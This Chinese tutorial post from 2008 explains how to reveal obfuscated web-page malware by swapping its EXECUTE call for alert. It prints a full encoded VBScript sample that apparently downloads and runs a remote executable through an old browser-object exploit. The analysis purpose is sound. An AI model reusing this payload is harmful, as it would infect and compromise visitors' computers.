首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Javascript

JS解密入门 最终变量劫持

Posted in Javascript onJune 25, 2008

如下是一段网马

<Script Language="VBScript">
Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50,55,50,54,70,55,50,50,48,53,50,54,53,55,51,55,53,54,68,54,53,50,48,52,69,54,53,55,56,55,52,48,68,48,65,52,51,54,69,52,67,53,50,53,53,51,68,50,50,54,56,55,52,55,52,55,48,51,65,50,70,50,70,55,55,55,55,55,55,50,69,54,66,55,50,55,54,54,66,55,50,50,69,54,51,54,70,54,68,50,70,55,55,54,70,55,50,54,68,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,70,54,50,50,48,51,68,50,48,54,52,54,70,54,51,55,53,54,68,54,53,54,69,55,52,50,69,54,51,55,50,54,53,54,49,55,52,54,53,52,53,54,67,54,53,54,68,54,53,54,69,55,52,50,56,50,50,54,70,54,50,50,50,50,54,50,50,54,65,54,53,50,50,50,54,50,50,54,51,50,50,50,54,50,50,55,52,50,50,50,57,48,68,48,65,52,70,54,50,50,69,53,51,54,53,55,52,52,49,55,52,55,52,55,50,54,57,54,50,55,53,55,52,54,53,50,48,50,50,54,51,54,67,54,49,50,50,50,54,50,50,55,51,55,51,54,57,54,52,50,50,50,67,50,48,50,50,54,51,50,50,50,54,50,50,54,67,55,51,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,52,51,65,52,50,52,52,51,57,50,50,50,54,50,50,51,54,52,51,51,53,51,53,50,50,50,54,50,50,51,54,50,68,51,54,51,53,50,50,50,54,50,50,52,49,51,51,50,68,51,49,51,49,52,52,51,48,50,50,50,54,50,50,50,68,51,57,51,56,51,51,52,49,50,68,51,48,51,48,52,51,50,50,50,54,50,50,51,48,51,52,52,54,52,51,51,50,51,57,50,50,50,54,50,50,52,53,51,51,51,54,50,50,48,68,48,65,55,51,52,56,53,52,53,52,53,48,51,68,50,50,52,68,50,50,50,54,50,50,54,57,54,51,50,50,50,54,50,50,55,50,54,70,50,50,50,54,50,50,55,51,50,50,50,54,50,50,54,70,54,54,50,50,50,54,50,50,55,52,50,50,50,54,50,50,50,69,53,56,50,50,50,54,50,50,52,68,50,50,50,54,50,50,52,67,50,50,50,54,50,50,52,56,50,50,50,54,50,50,53,52,53,52,50,50,50,54,50,50,53,48,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,48,54,70,55,48,50,48,51,68,50,48,52,70,54,50,50,69,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,52,56,53,52,53,52,53,48,50,67,50,50,50,50,50,57,48,68,48,65,53,48,54,70,55,48,50,69,52,70,55,48,54,53,54,69,50,48,50,50,52,55,50,50,50,54,50,50,52,53,53,52,50,50,50,67,50,48,52,51,54,69,52,67,53,50,53,53,50,67,50,48,52,54,54,49,54,67,55,51,54,53,48,68,48,65,53,48,54,70,55,48,50,69,53,51,54,53,54,69,54,52,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,55,54,54,50,55,51,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,54,53,48,52,57,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,53,51,54,51,55,50,54,57,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,52,54,57,54,69,54,55,50,69,52,54,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,67,54,53,50,50,50,54,50,50,53,51,55,57,50,50,50,54,50,50,55,51,55,52,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,68,52,70,50,50,50,54,50,50,54,50,54,65,54,53,50,50,50,54,50,50,54,51,55,52,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,51,54,53,55,52,50,48,55,51,53,52,54,68,55,48,50,48,51,68,50,48,52,54,53,48,52,57,50,69,52,55,54,53,55,52,53,51,55,48,54,53,54,51,54,57,54,49,54,67,52,54,54,70,54,67,54,52,54,53,55,50,50,56,51,50,50,57,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,57,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,57,48,68,48,65,52,49,52,49,51,68,50,50,52,49,50,50,50,54,50,50,54,52,50,50,48,68,48,65,52,49,52,50,51,68,50,50,54,70,50,50,50,54,50,50,54,52,50,50,50,54,50,50,54,50,50,50,50,54,50,50,50,69,50,50,50,54,50,50,55,51,50,50,50,54,50,50,55,52,55,50,54,53,50,50,50,54,50,50,54,49,54,68,50,50,48,68,48,65,52,49,54,52,52,68,51,68,52,49,52,49,50,54,52,49,52,50,48,68,48,65,53,51,54,53,55,52,50,48,52,50,54,52,54,49,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,52,49,54,52,52,68,50,67,50,50,50,50,50,57,48,68,48,65,52,50,54,52,54,49,50,69,55,52,55,57,55,48,54,53,51,68,51,49,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,50,48,53,48,54,70,55,48,50,69,53,50,54,53,55,51,55,48,54,70,54,69,55,51,54,53,52,50,54,70,54,52,55,57,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,52,50,54,52,54,49,50,69,53,52,55,57,55,48,54,53,51,68,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,53,52,54,53,55,56,55,52,50,48,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,50,50,53,55,55,51,54,51,55,50,54,57,55,48,55,52,50,69,53,51,54,56,54,53,54,67,54,67,50,50,50,50,50,57,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,51,54,56,54,53,54,67,54,67,50,69,53,50,55,53,54,69,50,48,50,56,50,50,50,50,50,50,50,54,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,54,50,50,50,50,50,50,50,57,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,51,54,53,55,52,50,48,53,51,54,56,54,53,54,67,54,67,50,48,51,68,50,48,52,69,54,70,55,52,54,56,54,57,54,69,54,55,50,50,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,55,51,53,50,55,53,54,69,51,68,50,50,53,51,50,50,50,54,50,50,54,56,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,67,50,50,50,54,50,50,50,69,50,50,50,54,50,50,52,49,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,48,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,57,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,50,55,53,54,69,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,53,50,55,53,54,69,50,54,50,50,54,51,54,49,55,52,54,57,54,70,54,69,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,50,55,53,54,69,50,69,53,51,54,56,54,53,54,67,54,67,52,53,55,56,54,53,54,51,55,53,55,52,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,50,50,50,50,50,67,50,50,50,50,50,67,50,50,52,70,55,48,54,53,54,69,50,50,50,67,51,48,34,58,68,61,34,69,88,69,67,85,84,69,32,34,34,34,34,34,58,67,61,34,38,67,72,82,40,38,72,34,58,78,61,34,41,34,58,68,79,32,87,72,73,76,69,32,76,69,78,40,83,41,62,49,58,73,70,32,73,83,78,85,77,69,82,73,67,40,76,69,70,84,40,83,44,49,41,41,32,84,72,69,78,32,68,61,68,38,67,38,76,69,70,84,40,83,44,50,41,38,78,58,83,61,77,73,68,40,83,44,51,41,32,69,76,83,69,32,68,61,68,38,67,38,76,69,70,84,40,83,44,52,41,38,78,58,83,61,77,73,68,40,83,44,53,41,13,10,76,79,79,80,58,69,88,69,67,85,84,69,32,68"

'以下是处理的函数
Function Rechange(Q)
S=Split(Q,",")
Cn922=""
For i = 0 To UBound(S)
Cn922=Cn922&Chr(eval(S(i)))
Next
Rechange=Cn922
End Function

'执行这个代码
EXECUTE(Rechange(Cn911))
</Script>

看到我的前几篇文章的朋友应该知道,前面的是10进制,直觉解就行了,不过下面有个处理函数,你用10进制解密出来之后还要去分析函数的功能,很不合算。Rechange这个是处理函数,这个函数的功能我们不知道,不要紧,我们看到最后这里有个EXECUTE(),说明这个就是执行函数,执行的内容是 Rechange(Cn911),我们把EXECUTE改为alert()就行了,也就是把最后一行改为alert(Rechange(Cn911))。

劫持完毕,打开网页,解密的内容弹出来了。

学习要点:对于这种网马,最后一定会有一个最终的变量或是表达式,修改执行函数即可

JS解密入门 最终变量劫持

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Javascript 相关文章推荐
JQuery中dataGrid设置行的高度示例代码
Jan 03 Javascript
JS 拦截全局ajax请求实例解析
Nov 29 Javascript
JavaScript之Date_动力节点Java学院整理
Jun 28 Javascript
Vue列表页渲染优化详解
Jul 24 Javascript
关于Angularjs中自定义指令一些有价值的细节和技巧小结
Apr 22 Javascript
在vue中实现点击选择框阻止弹出层消失的方法
Sep 15 Javascript
JS中使用cavas截图网页并解决跨域及模糊问题
Nov 13 Javascript
如何能分清npm cnpm npx nvm
Jan 17 Javascript
Vue Prop属性功能与用法实例详解
Feb 23 Javascript
jquery+ajax实现上传图片并显示上传进度功能【附php后台接收】
Jun 06 jQuery
Angular 中使用 FineReport不显示报表直接打印预览
Aug 21 Javascript
Vue 中使用lodash对事件进行防抖和节流操作
Jul 26 Javascript
JS解密入门之凭直觉解
Jun 25 #Javascript
js异或加解密效果代码
Jun 25 #Javascript
asp批量修改记录的代码
Jun 25 #Javascript
js innerHTML 的一些问题的解决方法
Jun 22 #Javascript
很酷的javascript loading效果代码
Jun 18 #Javascript
豆瓣网的jquery代码实例
Jun 15 #Javascript
JQuery实现自定义对话框的代码
Jun 15 #Javascript
自我评价(886) SOA面试题(9) Servlet面试题(20) Ruby面试题(15) 自我鉴定(671) Delphi面试题(13) MySQL面试题(19) PYTHON面试题(27) UNIX面试题(27) J2EE面试题(19)
You might like
PHP数组交集的优化代码分析
2011/03/06 PHP
探讨如何把session存入数据库
2013/06/07 PHP
PHP运行SVN命令显示某用户的文件更新记录的代码
2014/01/03 PHP
回帖脱衣服的图片实现代码
2014/02/15 PHP
PHP生成不重复标识符的方法
2014/11/21 PHP
php计算整个目录大小的方法
2015/06/19 PHP
PHP AjaxForm提交图片上传并显示图片源码
2016/11/29 PHP
PHP单例模式模拟Java Bean实现方法示例
2018/12/07 PHP
利用XMLHTTP传递参数在另一页面执行并刷新本页
2006/10/26 Javascript
前台js改变Session的值(用ajax实现)
2012/12/28 Javascript
离开当前页面前使用js判断条件提示是否要离开页面
2014/05/02 Javascript
如何用JavaScript实现动态修改CSS样式表
2016/05/20 Javascript
Angular.JS内置服务$http对数据库的增删改使用教程
2017/05/07 Javascript
详解node nvm进行node多版本管理
2017/10/21 Javascript
JavaScript实现快速排序的方法分析
2018/01/10 Javascript
详解webpack2异步加载套路
2018/09/14 Javascript
ztree加载完成后显示勾选节点的实现代码
2018/10/22 Javascript
基于Vue实现图片在指定区域内移动的思路详解
2018/11/11 Javascript
解决vant中 tab栏遇到的坑 van-tabs
2020/11/04 Javascript
使用Python脚本和ADB命令实现卸载App
2017/02/10 Python
python 计算两个日期相差多少个月实例代码
2017/05/24 Python
wxPython的安装与使用教程
2018/08/31 Python
python实现两个文件夹的同步
2019/08/29 Python
简单了解Python write writelines区别
2020/02/27 Python
Python实现鼠标自动在屏幕上随机移动功能
2020/03/14 Python
django实现模型字段动态choice的操作
2020/04/01 Python
基于python实现模拟数据结构模型
2020/06/12 Python
python实现npy格式文件转换为txt文件操作
2020/07/01 Python
关于iframe跨域使用postMessage的实现
2019/10/29 HTML / CSS
澳大利亚设计师服装在线:MISHA
2019/10/07 全球购物
Agoda中文官网:安可达(低价预订全球酒店)
2021/01/18 全球购物
计算机应用专业毕业生求职信
2013/10/24 职场文书
工业学校毕业生自荐书
2014/01/03 职场文书
财政专业大学生职业生涯规划书
2014/09/17 职场文书
2016年中秋祝酒词
2015/11/26 职场文书
python字典进行运算原理及实例分享
2021/08/02 Python